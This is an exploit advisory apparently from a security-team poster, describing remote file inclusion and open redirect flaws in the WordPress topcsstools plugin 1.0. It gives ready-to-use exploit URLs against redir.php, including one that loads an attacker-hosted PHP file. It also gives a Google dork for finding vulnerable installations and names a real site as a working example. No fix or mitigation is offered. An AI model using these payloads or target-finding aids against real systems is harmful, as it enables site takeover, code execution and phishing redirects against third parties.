KingSkrupellos

WordPress topcsstools Plugins 1.0 RFI and Open Redirect

Jan 14th, 2019
#################################################################################

# Exploit Title : WordPress topcsstools Plugins 1.0 Remote File Inclusion and Open Redirect
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : wordpress.org - cssgallery.com
# Software Information Links : cssgallery.com/premium-themes.html
+ cssgallery.com/css-design.html
# Version : 1.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/topcsstools/"
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
CWE-98 [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') ]

#################################################################################

# Open Redirection Exploit :
**************************

/wp-content/plugins/topcsstools/redir.php?u=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]

# RFI Remote File Inclusion Exploit :
**********************************

/wp-content/plugins/topcsstools/redir.php?u=http://[RFI-ADDRESS-HERE.gov/yourfilename.php.txt]

#################################################################################

# Example Vulnerable Site :
*************************

[+] cssgallery.com/wp-content/plugins/topcsstools/redir.php?u=http://exploit4arab.org/

Note : (50.63.43.1) => There are 3,158 domains hosted on this server.

#################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################